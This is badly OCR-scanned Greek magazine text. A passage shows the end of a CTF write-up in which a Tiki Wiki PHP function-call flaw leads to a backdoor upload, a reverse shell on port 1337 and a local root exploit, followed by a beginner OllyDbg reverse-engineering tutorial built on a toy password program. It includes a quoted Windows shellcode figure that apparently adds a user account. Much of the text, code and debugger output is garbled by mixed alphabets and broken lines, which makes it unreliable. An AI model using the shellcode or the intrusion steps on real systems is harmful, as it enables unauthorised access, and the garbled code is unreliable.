μένο exploit δεν δουλεύει µε ro ακριβὲς PID алла µε ro PID-1! Εκτελού- 
με, λοιπὸν 


./exploit 2575 


κι αµέσως παΐρνουμε reverse connection στο port 1337, µε δικαιώματα 
root (βλ. εικὀνα 5). Νομίζουμε бт! εἶναι περιττό να πούμε "game over”, 
€; :D 
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Εικόνα 1 
Εξαιτίας αδυναμίας 
που εντοπίζεται 
στο αρχείο tiki- 
graph_formula. 
php тои Tiki Wiki 
software, γίνεται 
δυνατή п σποµα- 
κρυσμένη κλήση 
συναρτήσεων 

της PHP. Εδώ 
βλέπουμε ὁτι о 
επιτιθέμενος μόλις 
το επαλήθευσε, 
καλώντας επιτυ- 
χώς τη συνάρτηση 
phpinfo(). 
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mini Λιαγωνισμάς CTF 
ri 


Εικόνα 2 

Na kai Ta ano- 
τελέσματα της 
εντολής Is, η οποία 
αποστέλεται ΚΙ 
εκτελείται στο 
μηχάνημα-στόχο 
μέσω της συνάρτη- 
σης system(). 


п menu ор ; т dmin in inch rch.php tiki-admi; 


n notifi include 


"οι ” 
= > i4 ^ h 
TY add site.php tik A . E j ier . ; age.php 
ry admin id iki-di КІ сіне Орр tiki-directorg - I-debug En . ankings.php ti g pdf -php 


iki-editpage.php tiki- 
tiki-export wiki pa 
eries rss.php ti 
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Εικόνα 3 

O κατάλογος 
temp ἐχει "avoi- 
χτά” δικαιώματα 
εγγραφής για το 
λογαριασμό www- 
data κι аито εἰναι 
ό,τι πρέπει για v” 
ανεβάσουµε TO 
backdoor µας στο 


μηχάνημα-στὀχο. 


Εικόνα 4 
To backdoor avé- 
βηκε KI EKTEÄEOTN- 
κε επιτυχώς στο 
απομακρυσμένο 
μηχάνημα, επι- 
κοινωνώντας µε 
τον listener στο 
box του attacker. 
Αποτέλεσμα; Shell 
access, baby! 
Πάμε тора και 

για ἑνα priviledge 
escalation... ;) 
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Το кало µε τους ορισμούς εἶναι ότι σου δίνουν µια ιδέα για TO τι EXEIG ν΄’ 
αντιμετωπίσεις ἡ ἐστω για τι πράγμα συζητὰς. То како µε τους ορισμούς 
εἶναι От! μερικές φορὲς δεν περιγράφουν επακριβώς την πραγματικότητα 
και, av µη TI ἆλλο, παραπλανούν. 


Πάρτε την περίπτωση του cracker. Апо τη μία, ιστορικἁ EXE! επικρατήσει 
o Орос να αφορά στον lamer, ο οποίος δεν εἶναι σε θέση va εκτιμήσει τη 
δουλειά ἄλλων και ουσιαστικά βουτάει τα εργαλεία τους και τσαλαβουτἁ 
εδώ κι EKEI στα νερά Tou hacking, χωρὶς να γνωρίζει τι ακριβώς κάνει ἡ 
πού θέλει να φτάσει. Апо την GAAn, ¿vag προγραμματιστής, ερευνητής 
ñ апла μαθητευόμενος στον προγραμματισμὀὸ ο οποίος “σπάει” (crack) 
µια εφαρµογἠ µε μοναδικὀ σκοπὀ τη μάθηση, σίγουρα δεν ἐχει μεγάλη 
σχέση µε τον προηγούμενο cracker. Πα να µη δημιουργούνται παρερ- 
μηνείες, Aoinóv, ειδικἁ σ΄ αυτήν την περίπτωση γίνεται χρήση του όρου 
"reverser". Πρόκειται για τίμιο ópo που περιγράφει αρκετά καλά αυτό 
που κάνει ο cracker µας: Χωρὶς να 'χει πρὀσβαση στο source code ενὸς 
προγράμματος ξεκινά ano το εκτελέἑσιµο binary, παίρνει κὠδικα μηχανὴς 
και προσπαθεἰ να κατανο- 
NOE την εσωτερική του 
λογική. 


Пат! όμως να θέλει 
κάποιος va μπει o' 
όλον αυτόν τον KONO; 
Υπάρχουν πολλοί Aó- 
γοι. Ενδέχεται, π.χ., να 
επιθυμεί να κατανοήσει 
πῶς δουλεύει Eva npóypau- 
μα nou τον γοητεύει ἡ να θέλει 
να τροποποιήσει τη λειτουργία του 
@OTE να κάνει καλύτερα αυτό που OE- 
λει. Ενδέχεται επἰσης να επιχειρεἰ va рп στη 
θέση evc κακὀβουλου cracker, οὕτως ώστε να εφοδιάἀ- 
σει τη δικἠ του εφαρμογἠ µε αποτελεσματικούς µηχανι- 
σμοὺς ката της αντιγραφής. 


Όποιος κι αν εἰν’ ο λὀγος yia rov onoio θέλει κάποιος 
v’ ασχοληθεἰ µε To reversing, To μόνο oiyoupo εἶναι 
ÓTI πρὀκειται va µπει O' £vav εκπληκτικὀ, περιπετειώδη 
κόσμο! ‘Eva ano τα απολύτως απαραίτητα εφόδια που θα 
XPEIAOTEI προκειμένου να µη χαθεἰ στο прото του κιόλας βήμα, εἶναι 
ἑνας καλὸς debugger. Σ’ auró το άρθρο θἑλουµε να σας μυήσουμε 
κι εσάς στον συναρπαστικὸ κόσμο του reversing. Θα πάρουμε τα 
πράγματα ano την apxn, ша και θέλουμε να κάνουμε σωστὴ δου- 
Леа KI επειδἠ στην TEAIKN κανεὶς δεν µας πιέζει :) 


Χωρὶς ἄλλες περιστροφὲς λοιπὀν ξεκινάμε pe тоу Olly debugger, 
το απολύτως апараітпто εφὀδιο nou κατεβάζουμε апо το 


Olly μαζί τα φάγαμε” 
ri 


www.ollydbg.de/download.htm 


Παίρνουμε συγκεκριµένα την ἐκδοση 1.10, n onoia εἶναι kai η τελευταία 
δοκιμασμένη release. Αποσυμπιέζουμε то ZIP с’ ὁποιον κατάλογο θέἐλου- 
με. Μια хара. Εἰμαστε rön ἐτοιμοι να “фаре”, μαζί µε Tov Olly, μερικά 
προγράμματα! (Σημειώστε Or! ο Olly εἶναι εκ γενετἠς ετοιμοπόλεμος και 
δεν απαιτεί εγκατάσταση.) 


Δεν υπάρχει καλύτερος τρόπος va μάθουμε Tov Olly debugger ano το va 
δουλέψουμε πάνω Of EVA συγκεκριμένο σενάριο. Θα φτιάξουμε για TO 
OKONO auró ἑνα пара πολὺ απλὀ πρόγραμμα σε C, Ва ro µεταγλωττίσου- 
He και θα τρέξουµε το εκτελέἑσιµο μέσα апо τον Olly. Έτσι, θα δούµε στην 
πράξη κάποιες βασικὲς τεχνικὲς και λειτουργίες. Γράφουμε, λοιπὀν, το 
παρακάτω απλὀ προγραμματάκι: 


/* Thiseas stupid program 2011 


stupic.c 


#include<stdio.h> 
#include<string.h> 
main() 
t 
char s[1024]; 
printf("Enter the password >>"); 
gets(s); 
if (Istrcmp(s,"neraki")) 


printf("Congratulations!! This is the correct 
password! n"); 


else 
printf("Sorry!! Wrong Password. Try again in"); 
return(0); 


} 


Μόλις τρέξει (and τη γραµµή εντολής), то πρὀγραμμα ζητά κἀποιο 
password. Av πληκτρολογήσουμε AUTO που περιμένει µας δίνει συγχαρη- 
τἠρια, αλλιώς µας προτρέπει να δοκιμάσουμε ξανὰ. 


Με απλἠ ανάγνωση rou source code διαπιστώνουμε бт! TO password nou 
ζητά το πρὀγραμμα εἶναι η λέξη "neraki” (xwpic Ta εισαγωγικἀ). Μετα- 
γλωτίζουμε то πρὀγραμμα HE Tov C/C++ compiler Tou Visual Studio 2010, 
πληκτρολογώντας στη γραμμή εντολἠς το ακὀλουθο: 


c:\> cl /w /TC stupid.c 


Με την προὐπόθεση Ori To source code βρἰσκεται στο αρχείο stupid.c, n 
παραπάνω εντολἡ θα δημιουργήσει το εκτελέσιμο stupid.exe. Μπορούμε 
va το δώσουμε στους φίλους µας, ζητώντας τους να βρουν ro password. 
Εδὠ εἰναι το θέμα! Μπορούμε να βρούμε To password έχοντας *uóvo* 
το EKTEAEOINO αρχείο; H απάντηση εἶναι καταφατικἠ. Καλύτερα μάλιστα 
va τρέξουμε το εκτελέσιμο αρχείο µε Tov Olly, οπὀτε η διαδικασία θα 
απλουστευτεἰ ακόμα περισσότερο. Ας πάρουμε όμως τα πράγματα апо 
την apxn. 
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Ανοἰγουµε Tov Olly και φορτώνουμε с’ αυτόν TO εκτελἑσιµο αρχείο nou 
μόλις φτιάξαμε: File --> Open κι επιλογἠἡ του stupid.exe. 


Όπως βλέπουμε, η βασικἠ οθόνη Tou Olly χωρίζεται σε τέσσερα βασικά 
μέρη. 


Μέρος 1. Πρόκειται για то κύριο μέρος στο οποίο εμφανἰζονται οι EVTO- 

λὲς που θα εκτελεστούν μόλις το πρὀγραμμά µας αρχίσει να τρέχει. Ναι, 

кала το καταλάβατε, το πρὀγραμµα δεν ἐχει ξεκινήσει ακόµα να τρέχει, 
Εικόνα 1 απλά έχει φορτωθεί στον Olly. Πρέπει va ξέρετε бт! κάθε εκτελέσιμο 
Η πρώτη οθόνη πρόγραμμα περιέχει τις εντολὲς σε µια µορφή nou εἶναι κατανοητή μόνον 
ano τον επεξεργαστἠ του υπολογιστή. Μαζὶ р’ αυτὲς που προέρχονται 
ano ro source code υπάρχουν κι ¿va соро AMET, που δεν ἐχουν σχέση 
µε τον nnyaio κὠδικα αλλά χρειάζονται ano το λειτουργικό σύστημα npo- 
κειμένου να μπορέσει να τρέξει σωστά το πρὀγραμμα. Θα αναρωτηθεἰτε 
- και µε το бікіо σας: Μα, πότε μπήκαν αυτές οι εντολὲς στο εκτελέσιμο; 


του Olly, иє TO 
npóypauuá µας 
φορτωμένο. 


= 
που ER. stupid. 00460090 
ETN 


C| 1 Ri СӨЕСФӨЙӨ | HOU EAX, DWORD PTR DS:L48ECCOl E Кү stupid Codi laEntryPoinva 
5506 TEST E 


: 56 USH ESI E ΝΕ 
. EI 14 [5-455] ESI 00090000 MEPOZ (2) 
а Е EDI 00000000 

ντε 07 JN2 SHORT stupid.00401680 


1 B8 00020000 | Που EAX, 200 ΕΙΡ 004016SC stupid.<Modu leEntryPoint> 
:vEB 06 še SHORT stupid. -00401686 ΜΕΡΟΣ (4) ES 0928 32bit O(FFFFFFFF) 


> 3806 CS 0023 32bit GLFFFFFFFF) 

x 97 5 E SHORT stupid. -00401688 SS 0028 32bit O(FFFFFFFF) 

> ЯЗ CeEc4ooo | HOU DWORD PTR DS: (40ECCOJ,ERX CREME 

τ» PUSH ΓΝ GS 0028 32bit OLFFFFFFFF) 

1 E8 12200000 CALL stupid. 00403ERS LastErr ERROR SUCCESS (00000000) 
POP ЕСК EFL 00000246 (NO,NB,E,BE, NS, PE, GE, LE) 


3d ECK STO enpty 
1 R3 mepc4oea | MOY DWORD PTR DS: [400CAB1,ERX 

75 1E JNZ SHORT stupid. 904016BC 

PUSH 4 

. 56 PUSH ESI 

. 8935 СӨЕС4@@@ МО) DWORD PTR DS:[40ECC81,ESI 
1 E$ F9270000 |CALL stupid. 00403ERS ete are. 
TEST ERK, EAX ЭТ? inb 


1 B3 neocaooo | HU DUORD PTR 05: (4000901, EAX EE m 

= rt » FCW 927F 
ντο 05 JNZ SHORT stupid. 0040168C 

Гей iR PUSH 1A 


4 
ϑΕΘ2] RETURN to ntdll.77809F02 
TEFDEGBÓ 
991 5ΕΕΒ4|| 00060008, 
9018FFR8| | 00208080 ΜΕΡΟΣ (4) 
ТЕЕПЕЙӨӨ 
00009000 
09009000 
7m Ξ | FFG 
2 rd t 
7 50 Sa 61 E E po M 
72 64 2E 20 54 79 20] FFFFFFFF|End of SEH chain 
ἐ é E d 77910AES| SE handler 
61 67 61 69 6E 0 gain... Heb 
ñ 08000006 
GO18FFEC [3 
90400030 778D3EDS| RETURN to ntdll.77809E0S from ntdll.778D9EDB 
BRAC AS 9940 stupid. <Modu leEntryPoint > bd 


Μπήκαν ката τη διάρκεια της μεταγλώττισης, órav δηλαδή δημιουργἠήσα- 
µε To stupid.exe. Οι εντολὲς εξάλλου εἰναι γραμμένες σε δυαδικἠ µορφή, 
όπως ακριβώς τις αναγνωρίζει ο επεξεργαστής, ónAaór| ως σειρἐς апо a 
και 1. Θα neite тора OT! δεν βλέπετε πουθενά @ και 1. Σωστά. Οἱ αριθμοί 
O και 1 εἶναι κρυμμένοι апо rov Olly, αλλιώς η παρατήρηση και η µελέτη 
του προγράµµατος θα napantav δύσκολες υποθέσεις - τουλάχιστον για 
κάθε φυσιολογικὀ άνθρωπο :) Αν тора Seite καλύτερα, το µέρος 1 xopi- 
ζεται σε TEOOEPIG στήλες. 
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e H στήλη 1 ögixvei σε 16δικἠ µορφή τη διεύθυνση μνήμης nou 
βρίσκεται η τρέχουσα εντολἠ. 


e H στήλη 2 περιέχει ακριβὼς την EVTOAN που θα πάρει o επεξερ- 
γαστἠς yia να εκτελέσει. H εντολἠ αυτή εἶναι, ὁπως εἰπαμε, Evac 
αριθμὸς σε δυαδικἠ μορφὴ (π.χ., κάπως ETOI: 10100101 10001100). 
О Olly ὁμως εμφανίζει αυτόν τον αριθµό σε 16δικἠ µορφή, αφού 
ETO! εἶναι nio κατανοητὀς (και KATA συνέπεια πιο εὖκολα διαχειρἰ- 
σιµος) ano εμάς. Σε πολλὲς περιπτώσεις ακολουθούν και κάποιες 
παράμετροι (επίσης αριθμο!), οι οποίες απαιτούνται για την єктё- 
Aeon µιας εντολἠς. Тора, θα θέλαμε να δώσετε μεγάλη npooo- 
χἠ σ΄ αυτούς τους αριθμούς, αφού, αν µη τι ἆλλο, αποτελούν την 
πραγματικἠ αναπαράσταση των εντολὠν του προγρἁμματὸς µας σε 
εκτελέσιµη (δυαδικἠ) µορφή. Προφανώς, αν μπορούσαμε ν΄ ano- 
μονώσουμε µια συγκεκριμένη ακολουθἰα τέτοιων αριθμών η οποία 
ἑκανε κάτι συγκεκριμένο, π.χ. εμφάνιζε στην οθόνη Eva κείμενο, 
τότε θα μπορούσαμε αυτὴ τη σειρά αριθμών va την πάρουμε και 
να την εκτελέσουµε µέσα о’ Eva δικὀ µας πρὀγραμμα ἡ ακόμα κι 
ως αυτόνομο, ξεχωριστὸ πρόγραµµα. Πρόκειται για εντολὲς napó- 
Holes р’ αυτὲς που βλέπουμε σε αρκετά exploits ἡ σε κὠδικα που 
εκτελείται μέσα апо Eva shellcode (βλ., π.χ., εικὀνα 2 και http:// 
www.exploit-db.com/exploits/17326). Μην ανησυχείτε αν δεν kaTa- 
λάβατε το τελευταίο поло кала, αφού οὗτως ἡ ἄλλως προέρχεται 
ano... βαθύτερα νερὰ. Προς ro παρὸν δεν θα επεκταθούμε, алла 
σας το λέμε WOTE να εἶστε υποψιασμένοι OT! αυτοί οι αριθµοἰ δεν 
εἶναι Ó,TI KI O,TI. 


e Ηστήλη 3 δεν εἶναι τίποτε παραπάνω ano το “AEKTIKO ισοδύναμο” 
της στήλης 2. Στην πραγματικότητα, εἶναι η αντίστοιχη EVTOAN σε 


γλὠσσα Assembly. H διαδικασία λήψης της εντολἠς Assembly ξεκι- Εικόνα 2 
νώντας апо µια EVTOAN σε δυαδικἠ μορφὴ ονομάζεται disassembly, Shellcode σε 
γι’ αυτὸ και δεν εἶναι λίγοι EKEIVOI που ονομάζουν τον Olly ка! κάποιο exploit... 


disassembler. 


e H στήλη 4, тё- she | 
λος, εἶναι λίγο 
πιο ανθρώπινη. 
Εμφανίζει πληρο- 
φορίες ὀπως τα 
ονόματα και TIG 
παραμέτρους που 
περνιούνται όταν 
καλείται μια συ- 
νάρτηση, ra λε- 
KTIKQ σε µορφή Administrator ASPNET 
χαρακτήρων (ба le B P tanan 1, SUPPORT 388945a0 
TO δούμε кало- ocuments and Settings\Administrator\Desktop\sh>sh.exe 
тєра παρακάτω i 112 byt 


include <stdio.h> 
#include <string.h> 
Hinclude <stdlib.h> 


int main()( 


unsigned char shellcode[]= 

"\ xeb\ x1b\ xSb\ x3 1\ xcO\ х50\ x31\ xcOVx88Y x43\ x4e\ x53\ xbb\ x0dY x25\ x86\ x70" 
"\ KEEN xa3\x31\ καθ) xSO\ xbb\ x12\ xcbyx81Vx7cVx£f|xd3Yxe8YxeOVx£fVxffVxffÍ'" 
"\ x63\ x6a\ x64\ xZe\ x65\ x78) x65\ х20\х22\ x63\ x20| x6e\ x65\ x74\ x20) x75\ x73" 
"\ x65\ x72\ x20\ x6b\ x 70V x 73V x 73V x20) x31V x32\ x33\ x34V х35\ x20 Y x2fY x61\ x64" 


EX Seg CAWINDOWS\system32tcmd.exe 


αυτό), ano поа sune and tings\Administrator\De »p\sh>Komut başarıyla tamamlandı. 
DLL προέρχεται η " rıyla tamamlandı. 
κλήση κ.λπ. > 


Μέρος 2. Eð% eupavi- ——— PA — ш 
ζονται ὁλοι O! καταχω- SUPPORT 38894520 

PNTEG rou επεξεργαστἡ 
(processor registers, 


[kp 
riyla tamamlandi. 


C:\Documents and Settings\Administrator\Deskto 
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http://en.wikipedia.org/wiki/Processor register). Πρόκειται yia προσω- 
pivà µέρη βοηθητικἡής μνήμης τα οποία βρίσκονται μέσα στον επεξερ- 
γαστἠ και χρησιμοποιούνται KATA κόρον ano τα προγράµµατα σε пара 
πολλὲς λειτουργίες: επικοινωνἱα µε τον επεξεργαστή, επικοινωνἱα µε TO 
stack, µεταφορά παραμέτρων, αναφορά λαθὼν κ.ο.κ. H γνώση της λει- 
тоорүіас̧ των καταχωρητώὠν εἶναι поло βασικἠ κι αποτελεί απαραίτητη 
προὐπόθεση апо κάποιον που θέλει у’ αποκαλεί εαυτὀν “reverser”. Για 
την επαρκἠ εξήγηση της λειτουργίας τους θα πρέπει у’ αφιερώσουμε Eva 
ολόκληρο άρθρο - και θα το κάνουμε σύντομα. Προς το παρὀν δώστε 
βάση στον τρόπο που εμφανίζει τους καταχωρητές o Olly. Όταν κάποιος 
καταχωρητής αλλάξει, αποκτήσει δηλαδἠ µια τιµή διαφορετικἠ απὀ αυ- 
τὴν nou εἶχε στην προηγούμενη εντολἠ, τότε κοκκινἰζει. Αρκετά βοηθη- 
τικἠ αυτή η αναπαράσταση, δεν μπορείτε va neite! 


Μέρος 3. Στο μέρος αυτό βλέπουμε τα περιεχόμενα της μνήμης. Epoa- 
νἰζονται σε τρεις στήλες. 


e Address: Н διεύθυνση της μνήμης. 


e Hex dump: Το περιεχόµενο της διεύθυνσης σε δεκαεξαδικἠ pop- 
On. 
e ASCII: Το περιεχόμενο της διεύθυνσης σε µορφή ASCII. 


Μέρος 4. Στο µέρος αυτό εμφανίζονται пал! περιεχόμενα της μνήμης, 
αλλά µιας ειδικἠς περιοχής που ονομάζεται stack. To stack εἶναι ша εξαι- 
ρετικἁ χρήσιμη борі δεδομένων (data sctructure) που χρησιμοποιείται 
ano τα προγράµµατα yia να περνάνε παραμέτρους στις συναρτήσεις, για 
να δηλώνονται οι τοπικὲς μεταβλητές των συναρτήσεων κ.ο.κ. Στο stack 
ψάχνουν прота oi hackers για αδυναμίες τύπου buffer overflow (http:// 
en.wikipedia.org/wiki/Stack_overflow) κι ἆλλα παρόμοια ...χαρωπά :) 


Έχουμε λοιπὸν μπροστά µας τα τέσσερα σημαντικότερα ἴσως µέρη nou 
πρέπει κάποιος να μελετά όταν EKTEÄEI EVA πρὀγραμμα µε OTOXO το 
reversing. Μέχρι στιγµἠς έχουμε δει τον Olly ν΄ απεικονίζει στατικά” 
αφενός τις εσωτερικὲς εντολὲς αφετέρου τη μνήμη και τις μεταβλητὲς 
EVOG εκτελέσιµου προγράµµατος. Το кало εἶναι οτι μπορεί va τ’ απεικονἰ- 
ζει Ох! µόνο OTATIKA αλλά *kal* δυναμικά! Εἶναι δηλαδἠ σε Oon va napa- 
κολουθείἰ τη λειτουργία ενὸς προγράµµατος καθώς EKEIVO εκτελείται - και 
μάλιστα unopsi να την παρακολουθεἰ EvTOAN προς εντολή! 


Πριν δούµε noc επιτυγχάνεται AUTO θα πρέπει να εξηγήσουμε µια πολύ 
βασικἠ έννοια στους debuggers: To breakpoint. Ουσιαστικά πρὀκειται 
για ἑναν δείκτη, τον οποίο μπορούμε να βάζουμε с’ οποιαδήποτε εντο- 
An. Όταν εκτελούμε EVA πρὀγραμμα µέσα апо rov Olly, αυτὸς παἰρνει κι 
EKTENEI μία προς uia τις EVTOAEG του. Μόλις συναντήσει την εντολἠ (ñ TIG 
εντολὲς) ὀπου έχουμε βάλει το δείκτη, τότε παγώνει την εκτέλεση TOU 


[С] CPU - main thread, module stupid 


CALL stupid. 98. 01 
ДИР stupid. 50491486 


— eee 


PUSH stupid.00408C000 


00401047 | PUSH stupid. 6848C626 
00401056 | PUSH stupid. 6648CG54 
@@40165С| CALL stupid. 90403001 
094920135 PUSH stupid. 9849N1E4 
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προγράμματος ἐχοντας επιλεγμένη την προς εκτέλεση EVTOAN KAI περι- 
μένει апо εμάς ἄλλες εντολὲς. Από τη μεριά µας, μπορούμε να κάνουμε 
Πολλά: Να ελέγξουμε τις τιμὲς των καταχωρητών, να μελετήσουμε τη 
μνήμη, να πούμε στον Olly να εκτελέσει μόνο την ENOHEVN EVTOAN κ.ο.κ. 
Θέλοντας να πάμε ακόµα πιο μακρυὰ, να πούμε Оті ἐχουμε τη δυνατὸ- 
τητα να παρεµβαίνουµε δυναμικὰ о’ ὀλη αυτἠ τη λειτουργία: Μπορούμε 
δηλαδή ν΄ αλλἀζουμετις εντολὲς ἡ τις τιμὲς στις μεταβλητές, τροποποιὀ- 
ντας στην ουσία τη συμπεριφορά του ἴδιου του προγράμματος! Μπορούμε 
ακόµα AUTO το αλλαγμένο πρὀγραμμα va το σώσουμε στο δίσκο, ως Eva 
κανονικὀ πρόγραµµα. 


Αν στο σηµείο AUTÒ µας πείτε ὁτι δεν έχετε εντυπωσιαστεὶ ακόµα, τότε 
μάλλον δεν έχετε καταλάβει τις δυνατότητες που ανοίγονται. Αλλά κάτι 
μας λέει ὁτι έχετε εντυπωσιαστεἰ ;) 


Πάμε тора μαζί να δούμε noc μπορούμε να τρέξουμε το stupid.exe ðu- 
хашка, βάζοντας κἀποια breakpoints. Θα πρέπει прота να καθορίσουμε 
ἑνα στὀχο : να βρούμε το password! Φυσικά, δεν θ’ ανατρέξουµε στον 
nnyaio κὠδικα, αφού υποτίθεται ὁτι апла δεν τον ἐχουμε. Па να πούμε 
την αλήθεια, η EUPEON rou password στο συγκεκριμένο πρόγραµµα δεν 
εἶναι αυτοσκοπός. Δεν εἶναι καθόλου δύσκολη υπόθεση και δεν απαιτείται 
o Olly για кайт! τἐτοιο. Μια αναζήτηση µέσα στο περιεχόμενο του EKTEAE- 
σιµου προγράµµατος арке! για va µας δώσει To password. Δεν αρκεἰ ὁμως 
για να µας δείξει τις αρετὲς Tou Olly, τον οποίο και θα χρησιμοποιούμε 
σ΄ ἄλλα, πολύ περισσότερο πολύπλοκα πρὀτζεκτ (παρεμπιπτόντως, βλ. 
και το άρθρο που αρχίζει апо τη σελἰδα 74 του παρὀντος τεύχους). Προς 
το παρὀν λοιπὸν ENITPEWTE µας αυτή την κάπως πιο qpyñ, εκπαιδευτικἠ 
προσέγγιση. 


Αν τρἐξουµε KAVOVIKA το πρὀγραμμα naipvoupe το μήνυμα 
Enter the password 


Θα κάνουμε λοιπὀν το εξής κολπάκι το οποίο, παρεμπιπτόντως, εἶναι πολύ 
συχνό στον κόσμο του reversing. Θα ψάξουμε µέσα στον disassembled 
κὠδικα του Olly το σηµείο ὁπου εμφανίζεται αυτή η σειρὰ χαρακτήρων, 
ώστε να βάλουμε εκεἰ Eva breakpoint και µετά να παρακολουθήσουμε την 
εξέλιξη του προγράμματος. Ара έχουμε να κάνουμε τ’ ακόλουθα βήματα. 


Βήμα 1 - εὔρεση της επιθυµητήἠς σειράς χαρακτήρων. 


Έχοντας ro ποντἰκι τοποθετημένο µέσα στον disassembled κὠδικα Kå- 
voupe δεξὶ κλικ κι επιλέγουμε Search for --> All referenced text strings. 
Να πούμε бт! то ἰδιο ακριβώς Oa συνέβαινε αν πατούσαµε το γαλάζιο 
κουμπάκι [В] στη γραμμὴ εντολών. Αμέσως ανοίγει Eva παράθυρο kal 
μας δεἰχνει όλα Ta strings (όπως τα ονομάζουμε εμείς, οι проүрарраті- 


Registers (FPU) 
EAX 75003388 ker 


[es JE er js) 


‚11 "Enter the password >>” 


‚11 "Congratulationstt This is the correct password'f[" 
(II "Sorrytt Wrong Password. Try again)” 

iitial CPU selection) 

‘II ”mscoree.dll” 


Eikóva 3 


Αναζήτηση µηνυ- 
μάτων μέσα στο 


εκτελέσιμο. 
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στὲς) του προγράμματος, δηλαδὴ όλα τα μηνύματα σε μορφὴ χαρακτή- 
ρων (BA. εικὀνα 3). Με διπλὸ κλικ πάνω στη συγκεκριμένη γραμμὴ о Olly 
μάς τοποθετεἰ ακριβώς στην EVTOAN του προγράμματος που εμφανίζει TO 
συγκεκριμένο string. 


Βήμα 2 - τοποθέτηση Tou breakpoint κι εκτἑλεση rou npo- 
γράμματος. 


Πατάμε το [F2] για να τοποθετήσουμε To breakpoint (θα δούμε οτι η 
αντίστοιχη διεύθυνση KOKKIVITEI, βλ. εικὀνα 4) κι αµέσως μετά πατάμε TO 
[F9] για να τρέξουμε το πρὀγραμμα. 


Βήμα 3 - εκτέλεση βήμα προς βήμα και μελέτη. 


Μόλις πατήσουμε [F9] δεν θα παρατηρήσουμε κάποια θεαµατικἠ αλλα- 
үй, пара μόνο бт! η διεύθυνση της εντολἠς ὀπου βάλαμε το breakpoint 
απέκτησε μαύρο φόντο. AUTO σημαίνει От! ro πρὀγραμμα ἐτρεξε και η 
εκτέλεση έφτασε στο breakpoint και тора ο Olly περιμένει and εμάς 
κάποια ενέργεια. Εδὠ μπορούμε να προχωρήσουμε βήμα-βήμα ἡ αλλιώς 
EVTOAN-EVTOAN, πατώντας TO [F8]. Ας το πατήσουμε μερικὲς Φορές, va 
δούμε TI θα γίνει. Παρατηρήστε oT! μόλις εκτελέσετε και την EVTOAN στη 
διεύθυνση 


00401027 |. E8 30030000 CALL stupid.0040135C 
δεν µπορείτε πλέον να συνεχίσετε µε το [F8]. Ξέρετε γιατὶ; Пат! o Olly 
συνάντησε EVTOAN η οποία αναμένει απάντηση апо το χρήστη. Npo- 
κειται για την EVTOAN αναμονὴς εισαγωγἠς password. Δώστε To string 
"trelaras" και πατήστε enter (βλ. εικὀνα 4). 


Μόλις πατήσετε το [Enter] θα δείτε бт! o ἐλεγχος επανέρχεται στον Olly 
και μπορείτε να συνεχίσετε. Πατάτε [F8] μέχρι την EVTOAN 


00401045 |. 75 ΘΕ JNZ SHORT stupid.00401056 
Κάντε δεξὶ κλικ πάνω στο 40 μέρος rou Olly (ναι, στο Stack window) κι 
Εικὀνα 4 επιλέξτε Show ASCII dump (βλ. εικὀνα 5). 
Κάνοντας 
debugging στο Ti va πρωτοπαρατηρήσει κανεὶς εδώ; Την EvTOAN; Τους καταχωρητές; To 
εκτελέσιμο... stack; Τη μνήμη; Ὅλα αυτά εἶναι “γεμάτα” εξαιτίας του βασικού ελέγχου 


που κάνει το πρὀγραμμα: Συγκρἰνει ro string "trelaras" που δώσαμε µε 


ες CPU - main thread, module stupid 


ES PUSH ЕВР 
SBEC MOV EBP,ESP 
S1EC 98049000) SUB ESP, 408 
Al 8604966 | MOV EAX, DWORD PTR DS:[409C088] 
33C5 XOR EAX, EBP 
8945 FC MOV DWORD PTR SS: imc EAX 
68 96004000 | PUSH stupid.0048C00) 
ERE Ее БЕГЕ αι 0040130 
8080 FSFBFFFF LER ERK, " DUORD PTR SS: LEBP-4681 
ES 30030000 — stupid.8040185C 
S3C4 84 D ESP,4. 


ωωάωσωια 


ASCII "Enter the password >>" 


Is 


the password >>trelaras 


Al 
(ΩΙ 
Al 
d 

a 


сы) ы) Сы) 


Olly μαζί τα φάγαμε” 
LLLI 


File View Debug Plugins Options Window Help 


s 55 PUSH ΕΒΕ Registers 
. 8BEC пой EBB ESP — P SAL 
1 &1EC 98040000] SUB ESP,408 

. Ri 80CG4066 HOU EAX, DUORD PTR 05:[40С0803 
3805 XOR EAX Haan 
; 8945 FC HOU DUORD PTR SS: СЕВР-42,ЕЯХ ASCII "treloras" 

. 5 PAULI P αρα белогоре RSCII "Enter the password >>” Hoey 
. Hi 

` 8304 δά ADD ESP, EERE 

1 8085 FSFBFFFFILEA EAX, Bor PTR SS: (EBP-408] 

1 50 PUSH EAX ΕΙΡ 80401045 stupid. 99491945 

1 ES 30030000 |CALL stupid. 9049135c C Q ES 0028 32bit OLFFFFFFFF) 
= S304 Bt ED ss Р = P à CS 6623 32bit BLFFFFFFFF) 
1 68 18004000 |PUSH stupid. 9940c918 ASCII ”neraki 00535 35516 OLEFFFFEFF) 
; 8080 FGFEFFFF LER ECX, DWORD PTR $$: CEBP-408] E 0028 3obit O(FFFFFFFF) 


Е PUSH ECK i 
1 Ёв 4000na0a |CALL srupid.00401080 EDIE LE LE 


. 8304 08 ADD ESP,8 
Έλεγχος zero flag — 

8500 | TEST EAX EAX = : LastErr ERROR SUCCESS (99999909 

00000202 (Nû, NE, NE, A, NS, PO, GE, 8) 


75 øF 11νζ SHORT stupid.80401056. - 
. 68 20004999 |PUSH stupid.0040C020 ASCII ”Congratulationst? This 


! ES 10830009 | CALL stupid. 22491360 empty 0.0 
5304 04 ADD ESP,4 empty 8.0 
«EB en JMP SHORT stupid. 401063 empty 0.0 
d 68 54004006 |PUSH stupid. 4944054 ASCII "Sorrytt Wrong Password. Tr: πριν 0:9 
ES 60930000 | CALL stupid. 08401260 empty 9.0 
ADD ESP,4 empty 0.0 
SOR EAX, EAX empty 8.8 
MOU ECX, OWORO PTR SS:[EBP-41 empty 0.0 

XOR ECX, EBP ç 19 ESPU 

CALL stupid. 98491432 айай С йй Er û û û û 

ЕВР 027F Р: 53 Mask 11 


Jump is t 
00401056: 


FFFFFFFE 


UTD —- - - 
0040c00a] 45 6E 74 65 72 20 74 6S|Enter th 1 90401348 stupid. 98401348 
90490003| 65 20 70 61/73 73 77 EF|e passuo === 

ZE 
00400018] 6E 65 72 61 68 69 00 00 pss SISTA 


aaisFB2eS| 0013FB20 
BB1SFB2C 


OG18FB34 
00128FB38| 0013FB9d 
ΒΘ1ΞΕΕΞΕΙ 76FOB3F2 RETURN to ntdll.76F9B3F2 from ntdll.?7 
9918FB49| ΘΘΘΏΘΕΕΘ 
@018ЕВ44 
ΘΘ18ΕΒ48 
8013FB4C 
